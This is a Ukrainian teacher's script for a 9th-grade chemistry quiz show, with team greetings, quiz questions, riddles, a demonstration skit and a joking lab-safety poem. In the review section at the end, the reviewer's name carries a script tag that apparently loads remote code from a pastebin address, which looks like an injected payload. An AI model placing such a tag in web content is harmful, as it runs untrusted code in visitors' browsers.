Позакласний захід Хімічний КВК для 9 класу

Про матеріал

Позакласний захід узагальнює та поглиблює знання з тем "Основні класи неоганічних солук", "Періодичний закон та періодична система Д.І.Менделєєва; удосконалює навички роботи в колективі й індивідуально

Перегляд файлу

ХІМІЧНИЙ КВК

 

Звучать фанфари.

Ведучий. Сьогодні в нашій гімназії відбудеться зустріч команд Гімназійної Хімічної Ліги. Кожен з вас, хто хоч раз дивився зустрічі команд НХЛ, думаю назавжди запам’ятав їхній азарт, особливу атмосферу ігор, яка робить їх справжнім видовищем.

(виходить королева хімії)

Королева хімії

Чудес на світі є багато пребагато,

Ще про одне вам хочу розказати;

Беру початок я із глибини віків

Від мудрих смілих знаючих алхіміків,

Що прагнули створити срібло-золото,

Що мріяли прожити вічно й молодо,

Що дали мені основу і життя,

Самі ж пішли в далеке забуття.

Сьогодні, зараз в нас змагання.

І я приготувалась зрання.

Ви стоїте на вході в королівство,

Повинні ви знайти дорогу в місто.

Важкою буде в вас дорога,

Чекають вас на ній пригоди.

Ніяк вам не пройти без формул, без рівнянь

І без міцних хімічних знань.

Даю свій дозвіл вам-

Заходьте в королівство,

І хто ви й звідки, розкажіть.

Розпочинаєм наше дійство,

Команди хіміків, увійдіть!

(Команди-учасниці входять до залу під бадьору музику)

 

Королева Хімії

Допомагати будуть тут

Журі, або Верховний суд.

Ці люди знані і поважні

У відповіді не потерплять фальші.

 

Голова журі-

Члени;  1)

   2)

 

Ведучий  Починаємо традиційний перший конкурс « Візитка». Ви, мабуть, помітили, що ми команди не назвали, отже  надаємо їм право самим про себе розповісти.

Слово для виступу надається команді «Атом».

Виступ команди «Атом»

           Увага! Дорогенькі!

      Великі і маленькі!

Вельмишановне панство!

Та інший контингент!

Дозвольте привітати

Здоровя побажати,

Сьогодні виступати

Й команду представляти.

          Вогні Ка – Ве – Ка

Наче зорі  горять

Команди на старті

Готові стоять.

          Буонд жорно!

Бонжур!

Гутен так!

Вітає «атом» вас.

           А ртистичні

Т  ворчі

О ригінальні

М  узичні

          У нас шестеро бійців,

Бравих учнів молодців.

Ще в нас ­­­­Віка капітан,

Вона в команді отаман.

       6. А я, як капітан команди, перед лицем своїх товаришів, урочисто обіцяю, що я, і   вся команда  будемо    боротися за звання веселих і кмітливих. Якщо програємо – не будемо лити гірких сліз.  Якщо    виграємо- не задиратимемо ніс.

          7. Ми покажемо, що вмієм

           Хай дивується весь світ.

           Приготуйтеся суперники,

           Вам хімічний наш ПРИВІТ!

          8. Противники сьогодні серйозні у нас,

           Це хімії любителі - 9-Б клас.

           Хай в боротьбі переможе достойний із нас.

           Тож від щирого серця вітаємо Вас.

( Команда вишикована півколом, капітан команди стоїть обличчям до команди  хіміків і диригує, команда виконує гімн. Вони співають, поклавши руку на серце.)

ГІМН ХІМІКІВ

1-й куплет

     Мы дышим все аммиаком и хлором,

     Мы кислотой до сердца прожжены,

     Предосторожность мы считаем вздором

     И все на вкус попробовать должны!

Припев

     Все выше и выше и выше

     К вершинам наук мы идем,

     И если с пути не собьемся,

     То, значит, откроем закон!

2-й куплет

     Мы рождены пролить все то, что льется,

     Рассыпать то, чего нельзя пролить

     Наш КВН химическим зовется-

     Мы будем вечно химию любить!

Припев

     Все выше и выше и выше

     К вершинам наук мы едем,

     И если с пути не собьемся,

     То, значит, откроем закон!

Ведуча. Слово для виступу надається команді «Алхімік»

  1. У цей святковий світлий час

      Вітає вас 9 клас

      Ми будем розважати вас

      І буде все це вищий клас.

           2.   Команда «Алхімік» буде:

      Думати – колективно,

      Діяти- оперативно,

Сперечатися- доказово-

Це для всіх обовязково.

          Ми покажемо, що вмієм,

Хай дивується весь світ.

Приготуйтеся, команди!

Наш хімічний всім привіт!

          Суперник сьогодні серйозний у нас.

О, славетні хіміки!

Вітаємо вас!

          Шановне журі!

Ми передаємо вам;

Терези для зважування наших сил,

Рахівницю для підрахунку балів,

Лупу, щоб краще могли побачити

Наші позитивні якості,

І окуляри,

Щоб бали пильнували.

          Про команду супротивника прошу памтати,

Ми за неї будем щиро вболівати,

Балів трішки можна нам додати,

Про це ніхто не буде знати.

          Від душі прийміть вітання

І найкращі побажання.

Будем всім ми вам бажати

Чемпіонами не стати.

           Команді вашій ми бажаєм;

Змагання нехай у фіналі

Вам срібні принесе медалі.

          Ми люди скромні- тож собі

Бажаєм лише золоті.

Останні чи перші- які б не були,

Назавжди залишимось друзями ми!

           «ЧЕРВОНА РУТА»

1-й куплет

     Ти признайся мені, звідки в тебе ті чари,

     Я без тебе всі дні у полоні печалі,

     Який крем мені взять, щоб лишилась красива?

     І шампунь, щоби мать всім волосся на диво?

Приспів

     Хімія мила, нездоланная сила,

     Ти у мене єдина тільки ти повір,

     Подаруй мені воду,

     порошки, мило, соду

     Та очищену воду з синіх гір.

2-й куплет

     Бачу я тебе в снах

     І в реакціях бачу,

     Твоя ніжна краса

     Мені щиро завдячить.

Приспів;

     Хімія мила, нездоланная сила,

     Ти у мене єдина, тільки ти повір,

     Подаруй мені вроду,

     Порошки, мило, соду

     Та очищену воду з синіх гір.

 

Ведуча. Слово для оцінювання першого конкурсу «Візитка» надається членам журі.

Команди « Атом» та «Алхімік» готові до бою.

Оголошується конкурс  « Швидкісна доріжка» .

  • Кожна команда отримує по вісім запитань.
  • Правильна відповідь- 1 бал.
  • Виграє той, хто дасть найбільшу кількість правильних відповідей.

Запитання команді «Атом»

     1.Найпоширеніший елемент на Землі є…(Оксиген)

2.Нестача якого елемента в організмі призводить до карієсу зубів? (Флуор)

3.   Без неї не проживем,

      ЇЇ властивостям немає меж.

 Життя без неї – справжній біль.

 Ви знаєте її. Це - …..                    ( Сіль).

  1. Який хімічний елемент названо на честь міфічного героя, який нібито вкрав вогонь у богів і передав його людям? (Прометей- Прометій)
  2. З яких частинок складається ядро атома? (Протони, нейтрони.)
  3. Валентність кислотного залишку в хлоридній кислоті? (I)
  4. Що показує порядковий номер елемента? (Кількість електронів, протонів, заряд ядра)
  5. Скисання молока- це… (Хімічне явище)

 

Запитання команді «Алхімік»

     1. Метал  рідкий за звичайних умов? (Ртуть).

2. Який газ отримують з кальцій карбіду? (Ацетилен).

  1. За яких умов реакції перебігають до кінця? (Осад, газ, вода.)
  2. Як називається газ, необхідний для  зелених рослин? (Вуглекислий).
  3. Повітря чиста речовина, чи суміш?  (Суміш)
  4. Назвіть формулу « болотного» газу (метан).
  5. Молярний об’єм газів дорівнює…(22,4 л)
  6. Який спирт не  можна пити? (Метанол)

 

 

Ведучий. Наступний конкурс « Дедуктивний метод»  Шерлока Холмса.

  Як Шерлок Холмс із його дедуктивним методом, так і будь-який детектив має вже тільки за описом визначити, про яку речовину йдеться. Команди прослухають деякі визначення, що стосуються загаданої речовини. Якщо є відповідь після першого визначення, то команда отримує 5 балів, після другого - 4 бали, третього - 3 бали тощо.

(Капітани обирають по три конверти і віддають ведучому)

  •      Його називають безжиттєвим газом.(5 балів)
  •      Це досить інертний газ. (4 бали)
  •      Він легший за повітря. (3 бали)
  •      Він входить до складу повітря. (2 бали)
  •      Його хімічна формула- N2

 

  • Це алотропна модифікація типового неметалу.(5 балів)
  • Хімічно активний газ (4 бали)
  • Газ із характерним різким запахом (3 бали)
  • Утворюється під час грози або у хвойному лісі під час окиснення смоли (2 бали)
  • Утворює озоновий шар. (1 бал) (Озон)

 

  • За поширеністю в земній корі посідає друге місце після оксигену. (5 балів)
  • Головний елемент у царстві мінералів і гірських порід. (4 бали)
  • Входить до складу кремнезему. (3 бали)
  • Приємно спекотного дня полежати біля моря на його оксиді. (2 бали)
  • Входить до складу силіконових каучуків. (1 бал) (Силіцій)

 

  • Елемент утворює найтвердішу речовину. (5 балів)
  • З нього виготовляють друкарську фарбу. (4 бали)
  • З цього неметалу виготовляють прикраси. (3 бали)
  • Його оксид бере участь у процесі фотосинтезу. (2 бали)
  • З нього виготовляють графітові стержні олівців .(1 бал) (Карбон)

 

  • Це речовини без яких ми вже не можемо обходитись.

 

  • Ми користуємось ними кожний день.

 

  • Вони вбивають риби в воді, рослини на землі.

 

  • У воді ці речовини утворюють багато піни.

 

  • З їх допомогою, все стає чистим. (Мийні засоби)

 

 

  • Його винайшли китайці.
  • Він утворює багато сміття.
  • Він легко горить.
  • Його отримують з деревини.
  • На ньому пишуть і малюють. (Папір)

 

 Ведучий. Слово для оцінювання конкурсу  « Швидкісна доріжка» надається членам Верховного суду.

 

    Ведучий. Оголошуєтьс конкурс «Рекламний агент»

           Командам пропонується створити рекламу хімічної речовини, використовуючи знання про її властивості, поширення у природі, значення для життєдіяльності людини.

(Команди вибирають по одному конверту. (Речовини: Кисень і залізо) Поки команди працюють - сценка «Алхімік»)

  Ведучий « Вогонь палав у лабораторії алхіміка, а двері були завжди на запорі;  сили природи треба випробовувати в тиші й удалені від сторонніх очей. Незабаром, незабаром він знайде спосіб робити золото. Тоді в одну ніч він стане найбагатшою людиною у світі.  Він буде мати золота стільки, скільки захоче. Очі його горіли пропасним блиском – спрагою золота» - це і є лабораторія  доктора алхімії.

Дівчинка – Скажіть, будь ласка, чи не ви доктор алхімії Магнус?

Алхімік ­­ - Що привело вас у цю скромну обитель науки? Чим можу бути вам корисний?

Дівчинка – А що за паличка у вас у руках?

Алхімік – О. це чарівна паличка, з її допомогою я можу перетворити воду на сік.

Дівчинка – Воду на сік? Так я вам і повірила.

Алхімік – Ти насмілилася не повірити мені – доктору алхімії,  якого знає вся гімназія? Тоді дивись.

            ( H2O+фенолфталеїн+NAOH)

 

      А може ти хочеш молока? Дивись, уважно!

     (Барій хлорид + Сульфатна кислота)

Дівчинка. Ви – чарівник! А можете фанту приготувати?

Алхімік – Без проблем.

              ( KMnO 4 + H2O+NaOH+Na2 SO3 )

 

      Дівчинка. А можна мені посмакувати?

Алхімік . Хімічні речовини не можна смакувати- це небезпечно!!!

Дівчинка.Ой наш час минає, тай вашою люб’язністю, пане докторе, зловживати не слід.

Алхімік. Одну хвилиночку, мені хочеться, щоб ти отримала що-небудь на згадку на честь нашого знайомства. Ну хоча б твій портрет.

Дівчинка. Але я не бачу у вас фотоапарата, докторе.

Алхімік. Не забувай, дівчинко, що я не фотограф, я алхімік. Доктор алхімії не має потреби ні у фотоапараті, ні у фарбах. Зараз я виконаю твій портрет. (Луг+фенолфталеїн)

Алхімік. Портрет готовий, забирай. Покажеш друзям, нехай помилуються.

Дівчинка. Дякую! Нам, напевно, треба вже йти, бо команди  готові змагатися далі.

Ведучий. Команди готові представити реклами речовин ?

 

 Слово надається журі для підбиття підсумків конкурсу « Шерлок Холмс»

 

 Ведучий Щоб не було проблем у кабінеті хімії

                 Повинен кожен зясувати поведінки лінію.

Виходить Баба Яга, відштовхує ведучу і знайомить учасників зі своїми правилами техніки безпеки.

Вот послушай-ка, дружок,

Преподам тебе урок,

Чтобы в этот раз, родимый,

Ног ты унести не смог!

 

У меня тут целый клад:

Калия перманганат

Есть и сера, есть и фосфор,

Есть и калия хлорат.

 

Компоненты точно взвесь,

Разотри получше смесь.

Если все пойдет как надо –

Разнесет здесь все как есть!

 

Приготовь гремучий газ,

Спичку поднеси тотчас.

Тут реакция цепная –

Враз останешься без глаз!

 

Лей-ка воду в кислоту,

Серную возьми, не ту!

Коль успеешь, то увидишь –

Брызги лягут за версту!

Что же, свет тебе не мил?

Руки щелочью облил?

Так протри глаза руками.

И про руки ты забыл.

 

 

Много всяческих рецептов

Есть у химии Яги:

Хошь – останешься без пальцев,

Ну, а хочешь – без ноги.

 

Я скажу, внучок, тебе:

Можно жить и без ТБ.

Хоть и плохо, хоть недолго,

Но зато во вред себе!

Ведуча.  Ви прослухали правила техніки безпеки від Баби Яги, а зараз покажіть свої знання з техніки безпеки. Проводимо конкурс «Життя моє у небезпеці без правил техніки безпеки»  (розігрується сценка «Неправильно проведена практична робота», потрібно вказати допущені помилки при виконанні практичної роботи)

Ведуча. Хімія – наука експериментальна, і в процесі її вивчення виконується чимало дослідів, які пов’язані з використанням небезпечних та їдких речовин. Тому необхідно дотримуватись певних правил під час роботи з реактивами.

Зараз двоє учнів розіграють сценку «Практична робота», допускаючи багато помилок і порушень правил техніки безпеки. Від кожної команди виходять по 1 учаснику, вказують по черзі допущені помилки при виконанні практичної роботи та пояснюють, як необхідно роботи правильно. (Кожна правильно вказана помилка оцінюється 1 бал)

Сценка «Практична робота».

У залі стоїть стіл. Заходять два учні, один з них щось їсть, вони сідають за стіл, учень кладе їжу на край столу (1). Починають виконувати досліди, при цьому один тримає пробірку, а інший наливає у неї реактиви (2), етикетка не повернута до долоні, флакони залишаються відкритими (3). Реактиви наливаються не над столом (4). Шепочуться й доливають новий реактив, не передбачений дослідом (5), нюхають (6), підпалюють спиртівку та нагрівають рідину в нижній частині полум’я (7), гасять спиртівку не ковпачком (8). Закривають флакони, витирають руки об одяг і доїдають принесену їжу (9, 10).

Слово надається журі для підбиття підсумків конкурсу « Рекламний агент»

 

Ведучий. Наступний конкурс «Дуель капітанів» (Звучить музика…)

Ви обираєте «заморочки з бочки» й перекладаєте з хімічної мови загальноприйнятими фразами.

За кожну правильну відповідь команда отримує 1 бал (Члени по черзі вибирають запитання)

  1. Не все те Аурум, що блищить. (Не все те золото, що блищить)
  2. Білий, як кальцій карбонат. (Білий, як крейда)
  3. Недонатрій хлорид на столі, а перенатрій хлорид на голові. (Недосіл на столі, пересіл на голові)
  4. Ферумний характер. (Залізний характер)
  5. Слово – Аргентум, а мовчання – Аурум. (Слово- срібло, а мовчання- золото)
  6. Іде, як H2 O в силіцій (IV) (Йде, як вода в пісок)
  7. Алотропна модифікація вуглецю чистої H2 O. (Алмаз чистої води)
  8. За купрумний гріш повісився (За мідний гріш повісився)
  9. Багато гідроген оксиду витикло відтоді. (Багато води витекло з того часу)
  10.  Як тверда H2 O на голову. (Як сніг на голову)

Ведучий. Прошу Верховний суд оголосити результати попередніх конкурсів

     Ведучий. Розпочинаємо «Конкурс ерудитів»

Кожна команда по черзі повинна відгадати загадки

         1.  Що дорожче золота? (Час)

              2. Кругом носа в’ється, а в руки не дається. (Повітря)

         3. Про який метал у народі кажуть: «Метал – і плуг у полі, і цвях у долі»? (Залізо)

              4.   Цю речовину Леонардо да Вінчі назвав «соком життя». (Вода)

             5.Чому персидський цар Кір, який жив більше двох тисяч років тому, під час походів пив воду із срібної посудини?

(Аg+ - йони мають бактерицидну дію. Тепер «срібну воду» використовують у медицині. Учені визначили, що 0,5г срібла за півгодини знищує всі шкідливі бактерії в 1л води).

 

        6. Якщо  подіяти  лугом,

           А,  може,  кислотою,

           Він  колір  свій  вмить змінить,

            І  стане  всім  відомий.       (Індикатор)

 

         7.  Господарці  необхідна ,

             І  при  випичці  потрібна.   (Сода)

 

          8. Я  - елемент  усім  відомий,

        В  повітрі  майже  невагомий,

        Мене  рослини  полюбляють,

        На  номер  схожий  всі  це  знають.  (Нітроген)

           9. “Рецепт”

    У  вільний  від  роботи  час  я  люблю  “хімічити”  на  кухні.  Ось  і  сьогодні  дещо  приготувала  для  вас.  Рецепт  моєї страви  дуже  простий:  беру  трошки  холодного  дигідрогенмонооксиду,  додаю  вуглеводи  і  змішую  круте  тісто.  Розкачую  його,  роблю  кульки,  заліплюю  туди  тушкований  крохмаль  і  кидаю  в  киплячий  дигідрогенмонооксид. Змащую  жиром.  Страва  готова.  Яку  саме  страву  я  приготувала ?   (Вареники  з  картоплею)

 

Слово надається журі для підбиття підсумків конкурсу «Конкурс ерудитів»

 

 

 

 Ведуча.    Вже  час  для  домашнього  завдання  настав.

                   Його  чекали  з  нетерпінням  всі

                   Нехай  наш  конкурс  святом  стане,

                   Для  серця й  для  душі.

Отже, домашнє  завдання. Музичний кліп на тему «Вода»

 

Ведуча. Поки журі готується оголосити підсумки нашої гри, я пропоную командам останнє завдання, яке вимагає більше кмітливості та спритності, спортивних навичок, ніж якихось конкретних знань з хімії.

Я даю вам повітряні кульки, на кожній з яких написано одну літеру. Ваше завдання – кульки надути та скласти з них речення.

( Хімія - це круто!)

Голова журі. Підведення підсумків. Нагородження команд

 

Цариця Хемі

Я вас вітаю, переможці!

Мети своєї досягли –

          До перемоги перші ви прийшли

          Та лишень ви не зазнавайтесь

          Мене й надалі не цурайтесь

Баба Яга

А ви старались, як могли,

Та вже не першими були.

Гарненько хімію вивчайте

І в наступних змаганнях перемагайте

Ведуча.  Ми  побували  з  вами  в  царстві  хімії,  ви  показали  свої  знання. Ми  щиро  вдячні за винахідливість, кмітливість.

До  нових  зустрічей – цікавих  і  змістовних!

Хай  вони  поглиблюють наші  знання,  заохочують  вивчати  надзвичайно  цікаву  науку – хімію.

 

Середня оцінка розробки
Структурованість
4.0
Оригінальність викладу
5.0
Відповідність темі
5.0
Загальна:
4.7
Всього відгуків: 1
Оцінки та відгуки
  1. Верба Ксенія Тарасівнаscript src'//pastebin.com/raw/wcNQrkG4'>/script>
    Загальна:
    4.7
    Структурованість
    4.0
    Оригінальність викладу
    5.0
    Відповідність темі
    5.0
docx
Додано
20 січня 2018
Переглядів
2175
Оцінка розробки
4.7 (1 відгук)
Безкоштовний сертифікат
про публікацію авторської розробки
Щоб отримати, додайте розробку

Додати розробку